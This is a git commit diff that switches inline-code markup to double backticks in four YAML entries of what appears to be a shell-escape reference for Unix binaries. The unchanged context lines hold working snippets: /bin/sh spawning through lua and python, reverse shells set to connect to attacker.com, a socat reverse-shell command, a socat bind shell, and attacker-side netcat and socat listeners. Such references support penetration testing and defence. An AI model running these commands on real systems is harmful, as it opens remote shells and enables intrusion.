Use double backtick for inline code

This commit is contained in:
Emilio Pinna 2018-07-22 15:22:03 +01:00
parent b016b7b9dd
commit 4de0246992
4 changed files with 5 additions and 5 deletions

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: lua -e 'os.execute("/bin/sh")' - code: lua -e 'os.execute("/bin/sh")'
reverse-shell-non-interactive: reverse-shell-non-interactive:
- description: Run <code>nc -l -p 12345</code> on the attacker box to receive the shell. This requires `lua-socket` installed. - description: Run ``nc -l -p 12345`` on the attacker box to receive the shell. This requires `lua-socket` installed.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: python2 -c 'import os; os.system("/bin/sh")' - code: python2 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345

View File

@ -3,7 +3,7 @@ functions:
execute-interactive: execute-interactive:
- code: python3 -c 'import os; os.system("/bin/sh")' - code: python3 -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
export RHOST=attacker.com export RHOST=attacker.com
export RPORT=12345 export RPORT=12345

View File

@ -1,13 +1,13 @@
--- ---
functions: functions:
reverse-shell-interactive: reverse-shell-interactive:
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell. - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: | code: |
RHOST=attacker.com RHOST=attacker.com
RPORT=12345 RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive: bind-shell-interactive:
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell. - description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
code: | code: |
LPORT=12345 LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane